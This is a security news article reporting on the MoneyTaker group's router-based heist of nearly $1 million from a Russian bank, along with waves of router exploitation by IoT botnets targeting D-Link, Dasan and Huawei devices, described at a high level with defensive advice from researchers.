Router Compromise Enables $1 Million Bank Cyberheist

A cybercriminal group known for targeting financial institutions has managed to steal almost $1 million from a large Russian bank after hacking into a router at one of its regional branches.

The group, known in the security industry as MoneyTaker, has been operating since at least 2016 and has targeted banks from the United States, U.K. and Russia. The group uses advanced techniques such as setting up new infrastructure for every attack, lurking inside networks for months before striking and using “fileless” malware techniques and tools such as Metasploit and the PowerShell Empire framework to remain undetected.

In the group’s latest attack, which was investigated by researchers from cybercrime intelligence firm Group-IB, the hackers compromised a router from a branch of Russian bank PIR Bank, then used the network tunnels configured in the device to access and move laterally through the bank’s main network.

This technique is characteristic of MoneyTaker and has been used in at least three attacks against banks with regional branch networks, Group-IB said in a report shared via email. While in the PIR Bank’s main network, the hackers managed to gain access to the Automated Work Station Client of the Russian Central Bank (AWS CBR) and initiated rogue payment orders.

The money was sent to accounts set up at 17 other banks and was immediately cashed out by money mules at ATMs. By the time PIR Banks’ employees discovered the rogue transfers and notified the Central Bank, it was already too late to reverse the transfers.

After executing the attack, the hackers deleted OS logs from workstations and servers to hinder forensic investigation but left behind some reverse shells so they could regain access to the network at a later time if needed.

“It is evident that MoneyTaker is one of the top threat to the banks all over the world,” Group-IB said. “Since the entry point in most successful attacks conducted by this group was routers, it is first necessary to check if you have the up-to-date firmware, test systems for brute-force vulnerabilities and detect changes in router configuration in a timely manner.”

Routers increasingly are targeted by hackers and, as shown by this incident, they can serve as launch pads for further attacks against local systems. Since routers don’t typically have security software running on them, discovering that they’ve been compromised can take a very long time, giving attackers a persistent foothold into local networks.

The sophisticated VPNFilter malware, which has infected more than 500,000 routers around the world and is believed to be the work of a Russian state-sponsored cyberespionage group, targets small-business router models from many manufacturers. The malware was recently used to launch an attack against a Chlorine plant in Ukraine.

Renewed Wave of Attacks Targets D-Link and Dasan Routers

A new wave of attacks has hit home and small business routers made by D-Link and Dasan, thanks to hackers’ increased routers in IoT botnets.

Cybersecurity firm eSentire observed exploit attempts against D-Link 2750B and Dasan GPON routers coming from more than 3,000 different source IP addresses July 19. The attackers used a Python script to exploit known command injection and remote code execution flaws in older D-Link 2750B firmware, and critical vulnerabilities in GPON routers made by Dasan Networks were disclosed publicly in May.

“A successful recruitment campaign has the potential to arm the associated threat actor(s) with DDoS artillery and facilitate espionage of private browsing habits,” the eSentire researchers said in a blog post. “Botnets built using compromised routers may eventually be offered as a service to other threat actors, used for extorting DDoS victims among other uses.”

Also this week, a hacker managed to build a botnet of over 18,000 devices in a single day by exploiting a vulnerability in Huawei HG532 routers. The flaw, tracked as CVE-2017-17215, has been known and patched since 2017, but the fact that there are still so many vulnerable routers out there after all this time shows why IoT botnets are a growing threat.

Lucian Constantin

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at [email protected] or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42

lucian-constantin has 298 posts and counting.See all posts by lucian-constantin